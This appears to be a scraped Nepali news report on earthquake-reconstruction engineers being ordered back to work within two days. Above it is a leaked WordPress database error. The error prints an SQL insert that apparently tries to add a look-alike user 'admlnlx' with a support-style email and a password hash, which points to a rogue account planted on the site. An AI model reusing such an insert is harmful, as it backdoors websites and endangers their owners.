WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXpKQKcaJJMOhqNBoWqMasPI54lesc1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 00:18:53', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७–
सहरी विकास मन्त्रालय, केन्द्रीय आयोजना कार्यान्वयन एकाइले पुनःनिर्माणमा खटिएका इन्जिनियर/प्राविधिकलाई दुई दिनभित्र काममा फर्कन निर्देशन दिएको छ ।
एकाइका आयोजना निर्देशक शिवहरि शर्माले आज प्राविधिकका नाममा जारी गरेको सूचनामा दुई दिनभित्र काममा फर्कन नचाहनेलाई सम्बन्धित जिल्ला आयोजना कार्यान्वयन एकाइमा आफैँ उपस्थित भई निवेदन दिएर सनाखत गरी करार सम्झौता अन्त्य गर्न अनुरोध गर्नुभएको छ । “करार सम्झौता अन्त्य भई रिक्त हुन आएका पदमा नियमअनुसार वैकल्पिक उम्मेदवारको सूचीबाट अथवा अन्य प्रक्रिया अपनाएर करार सेवामा पदपूर्ति गरिन्छ”– उहाँले भन्नुभयो ।
राष्ट्रिय पुनःनिर्माण प्राधिकरण निर्देशक समितिको कात्तिक १० र मङ्सिर ५ गतेको निर्णयानुसार प्राविधिकलाई भौगोलिक तथा कार्यसम्पादनका आधारमा ७५ प्रतिशतसम्म भत्ताको व्यवस्था गर्ने निर्णय भएको तथा निर्णय कार्यान्वयन गर्न प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालय, अर्थ मन्त्रालय र प्राधिकरणको समन्वयमा कार्यसम्पादनका सूचक तयार गरी मन्त्रिपरिषद् बैठकमा पेस गर्ने तयारी भएको एकाइले जनाएको छ ।
भूकम्प अतिप्रभावित १४ जिल्लामा अधिकांश लाभग्राहीले पहिलो किस्ता बुझी घर निर्माणको काम गरिरहेको र केही लाभग्राहीले दोस्रो किस्ता पनि माग गर्न थालिसकेका छन् । –रासस